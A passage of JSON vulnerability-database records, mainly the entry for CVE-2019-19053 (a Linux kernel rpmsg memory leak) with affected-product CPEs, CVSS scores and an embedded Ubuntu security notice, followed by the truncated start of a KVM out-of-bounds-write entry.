            "operator": "OR"
          },
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:steelstore_cloud_integrated_storage:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:data_availability_services:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire_\\\u0026_hci_management_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vmware_vsphere:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:solidfire\\,_enterprise_sds_\\\u0026_hci_storage_node:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:o:broadcom:brocade_fabric_operating_system_firmware:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:fas\\/aff_baseboard_management_controller:-:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.0.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.20:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.25:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.30.5r3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.3r2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.40.5:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:-:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.50.2:p1:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.0:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.60.3:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.1:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:e-series_santricity_os_controller:11.70.2:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:netapp:hci_baseboard_management_controller:h610s:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:solidfire_baseboard_management_controller_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:solidfire_baseboard_management_controller:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:netapp:hci_compute_node_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:netapp:hci_compute_node:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Ubuntu",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "db": "PACKETSTORM",
        "id": "156771"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ],
    "trust": 0.8
  },
  "cve": "CVE-2019-19053",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "HIGH",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Complete",
            "baseScore": 7.8,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19053",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "High",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "VULHUB",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "VHN-151461",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.1,
            "vectorString": "AV:N/AC:L/AU:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "CVE-2019-19053",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2019-19053",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201911-1070",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "VULHUB",
            "id": "VHN-151461",
            "trust": 0.1,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A memory leak in the rpmsg_eptdev_write_iter() function in drivers/rpmsg/rpmsg_char.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering copy_from_iter_full() failures, aka CID-bbe692e349e2. Linux Kernel Contains a resource exhaustion vulnerability. Vendors have confirmed this vulnerability CID-bbe692e349e2 It is released as.Service operation interruption (DoS) There is a possibility of being put into a state. =========================================================================\nUbuntu Security Notice USN-4300-1\nMarch 16, 2020\n\nlinux, linux-aws, linux-gcp, linux-gcp-5.3, linux-gke-5.3, linux-hwe,\nlinux-kvm, linux-oracle, linux-raspi2, linux-raspi2-5.3 vulnerabilities\n=========================================================================\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 19.10\n- Ubuntu 18.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the Linux kernel. \n\nSoftware Description:\n- linux: Linux kernel\n- linux-aws: Linux kernel for Amazon Web Services (AWS) systems\n- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems\n- linux-kvm: Linux kernel for cloud environments\n- linux-oracle: Linux kernel for Oracle Cloud systems\n- linux-raspi2: Linux kernel for Raspberry Pi 2\n- linux-gcp-5.3: Linux kernel for Google Cloud Platform (GCP) systems\n- linux-gke-5.3: Linux kernel for Google Container Engine (GKE) systems\n- linux-hwe: Linux hardware enablement (HWE) kernel\n- linux-raspi2-5.3: Linux kernel for Raspberry Pi 2\n\nDetails:\n\nIt was discovered that the KVM implementation in the Linux kernel, when\nparavirtual TLB flushes are enabled in guests, the hypervisor in some\nsituations could miss deferred TLB flushes or otherwise mishandle them. An\nattacker in a guest VM could use this to expose sensitive information (read\nmemory from another guest VM). (CVE-2019-3016)\n\nPaulo Bonzini discovered that the KVM hypervisor implementation in the\nLinux kernel could improperly let a nested (level 2) guest access the\nresources of a parent (level 1) guest in certain situations. An attacker\ncould use this to expose sensitive information. (CVE-2020-2732)\n\nIt was discovered that the Afatech AF9005 DVB-T USB device driver in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-18809)\n\nIt was discovered that the Intel(R) XL710 Ethernet Controller device driver\nin the Linux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19043)\n\nIt was discovered that the RPMSG character device interface in the Linux\nkernel did not properly deallocate memory in certain error conditions. (CVE-2019-19053)\n\nIt was discovered that the Marvell Wi-Fi device driver in the Linux kernel\ndid not properly deallocate memory in certain error conditions. (CVE-2019-19056)\n\nIt was discovered that the Intel(R) Wi-Fi device driver in the Linux kernel\ndevice driver in the Linux kernel did not properly deallocate memory in\ncertain error conditions. (CVE-2019-19058,\nCVE-2019-19059)\n\nIt was discovered that the Serial Peripheral Interface (SPI) driver in the\nLinux kernel device driver in the Linux kernel did not properly deallocate\nmemory in certain error conditions. \n(CVE-2019-19064)\n\nIt was discovered that the Brocade BFA Fibre Channel device driver in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19066)\n\nIt was discovered that the Realtek RTL8xxx USB Wi-Fi device driver in the\nLinux kernel did not properly deallocate memory in certain error\nconditions. (CVE-2019-19068)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 19.10:\n  linux-image-5.3.0-1011-oracle   5.3.0-1011.12\n  linux-image-5.3.0-1012-kvm      5.3.0-1012.13\n  linux-image-5.3.0-1013-aws      5.3.0-1013.14\n  linux-image-5.3.0-1014-gcp      5.3.0-1014.15\n  linux-image-5.3.0-1019-raspi2   5.3.0-1019.21\n  linux-image-5.3.0-42-generic    5.3.0-42.34\n  linux-image-5.3.0-42-generic-lpae  5.3.0-42.34\n  linux-image-5.3.0-42-lowlatency  5.3.0-42.34\n  linux-image-5.3.0-42-snapdragon  5.3.0-42.34\n  linux-image-aws                 5.3.0.1013.15\n  linux-image-gcp                 5.3.0.1014.15\n  linux-image-generic             5.3.0.42.36\n  linux-image-generic-lpae        5.3.0.42.36\n  linux-image-gke                 5.3.0.1014.15\n  linux-image-kvm                 5.3.0.1012.14\n  linux-image-lowlatency          5.3.0.42.36\n  linux-image-oracle              5.3.0.1011.12\n  linux-image-raspi2              5.3.0.1019.16\n  linux-image-snapdragon          5.3.0.42.36\n  linux-image-virtual             5.3.0.42.36\n\nUbuntu 18.04 LTS:\n  linux-image-5.3.0-1014-gcp      5.3.0-1014.15~18.04.1\n  linux-image-5.3.0-1014-gke      5.3.0-1014.15~18.04.1\n  linux-image-5.3.0-1019-raspi2   5.3.0-1019.21~18.04.1\n  linux-image-5.3.0-42-generic    5.3.0-42.34~18.04.1\n  linux-image-5.3.0-42-generic-lpae  5.3.0-42.34~18.04.1\n  linux-image-5.3.0-42-lowlatency  5.3.0-42.34~18.04.1\n  linux-image-gcp-edge            5.3.0.1014.13\n  linux-image-generic-hwe-18.04   5.3.0.42.99\n  linux-image-generic-lpae-hwe-18.04  5.3.0.42.99\n  linux-image-gke-5.3             5.3.0.1014.4\n  linux-image-lowlatency-hwe-18.04  5.3.0.42.99\n  linux-image-raspi2-hwe-18.04    5.3.0.1019.8\n  linux-image-snapdragon-hwe-18.04  5.3.0.42.99\n  linux-image-virtual-hwe-18.04   5.3.0.42.99\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. \nUnless you manually uninstalled the standard kernel metapackages\n(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,\nlinux-powerpc), a standard system upgrade will automatically perform\nthis as well. \n\nReferences:\n  https://usn.ubuntu.com/4300-1\n  CVE-2019-18809, CVE-2019-19043, CVE-2019-19053, CVE-2019-19056,\n  CVE-2019-19058, CVE-2019-19059, CVE-2019-19064, CVE-2019-19066,\n  CVE-2019-19068, CVE-2019-3016, CVE-2020-2732\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux/5.3.0-42.34\n  https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1013.14\n  https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1014.15\n  https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1012.13\n  https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1011.12\n  https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1019.21\n  https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1014.15~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1014.15~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-42.34~18.04.1\n  https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1019.21~18.04.1\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "db": "PACKETSTORM",
        "id": "156771"
      }
    ],
    "trust": 1.89
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2019-19053",
        "trust": 2.7
      },
      {
        "db": "PACKETSTORM",
        "id": "156772",
        "trust": 0.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070",
        "trust": 0.7
      },
      {
        "db": "AUSCERT",
        "id": "ESB-2020.0947",
        "trust": 0.6
      },
      {
        "db": "VULHUB",
        "id": "VHN-151461",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "156771",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "db": "PACKETSTORM",
        "id": "156771"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "id": "VAR-201911-1406",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:25:55.403000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "rpmsg: char: release allocated memory",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/bbe692e349e2a1edf3fe0a29a0e05899c9c94d51"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-401",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-400",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://security.netapp.com/advisory/ntap-20191205-0001/"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/bbe692e349e2a1edf3fe0a29a0e05899c9c94d51"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/4300-1/"
      },
      {
        "trust": 1.7,
        "url": "https://usn.ubuntu.com/4301-1/"
      },
      {
        "trust": 1.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19053"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-19053"
      },
      {
        "trust": 0.6,
        "url": "https://packetstormsecurity.com/files/156772/ubuntu-security-notice-usn-4301-1.html"
      },
      {
        "trust": 0.6,
        "url": "https://www.auscert.org.au/bulletins/esb-2020.0947/"
      },
      {
        "trust": 0.6,
        "url": "https://vigilance.fr/vulnerability/linux-kernel-multiple-vulnerabilities-via-memory-leak-30911"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19059"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19066"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-3016"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-2732"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19068"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19056"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4301-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.0/5.0.0-1032.33"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws-5.0/5.0.0-1027.30"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.0.0-1033.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.0/5.0.0-1013.18"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/5.3.0-42.34"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-hwe/5.3.0-42.34~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.3/5.3.0-1014.15~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.3.0-1012.13"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2-5.3/5.3.0-1019.21~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/4300-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.3.0-1011.12"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19058"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.3.0-1014.15"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-18809"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-aws/5.3.0-1013.14"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19043"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-raspi2/5.3.0-1019.21"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-gke-5.3/5.3.0-1014.15~18.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2019-19064"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "db": "PACKETSTORM",
        "id": "156771"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "db": "PACKETSTORM",
        "id": "156771"
      },
      {
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2019-11-18T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "date": "2020-03-17T13:10:06",
        "db": "PACKETSTORM",
        "id": "156772"
      },
      {
        "date": "2020-03-17T13:09:58",
        "db": "PACKETSTORM",
        "id": "156771"
      },
      {
        "date": "2019-11-18T06:15:11.903000",
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "date": "2019-11-18T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-01-19T00:00:00",
        "db": "VULHUB",
        "id": "VHN-151461"
      },
      {
        "date": "2019-11-25T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      },
      {
        "date": "2023-01-19T19:43:51.683000",
        "db": "NVD",
        "id": "CVE-2019-19053"
      },
      {
        "date": "2020-08-25T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel Vulnerable to resource exhaustion",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2019-012045"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "resource management error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201911-1070"
      }
    ],
    "trust": 0.6
  }
}

var-202105-0904
Vulnerability from variot

A flaw was found in the Linux kernel in versions before 5.12. The value of internal.ndata, in the KVM API, is mapped to an array index, which can be updated by a user process at anytime which could lead to an out-of-bounds write. The highest threat from this vulnerability is to data integrity and system availability. Linux Kernel Is vulnerable to an out-of-bounds write.Information is tampered with and denial of service (DoS) It may be put into a state. KVM is one of the kernel-based virtual machines. This vulnerability could result in an out-of-bounds write. Description:

Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images

Red Hat Advanced Cluster Management for Kubernetes provides the capabilities to address common challenges that administrators and site reliability engineers face as they work across a range of public and private cloud environments. Clusters and applications are all visible and managed from a single console—with security policy built in. See the following Release Notes documentation, which will be updated shortly for this release, for additional details about this release:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana gement_for_kubernetes/2.2/html/release_notes/

Security fixes:

  • redisgraph-tls: redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms (CVE-2021-21309)

  • console-header-container: nodejs-netmask: improper input validation of octal input data (CVE-2021-28092)

  • console-container: nodejs-is-svg: ReDoS via malicious string (CVE-2021-28918)

Bug fixes:

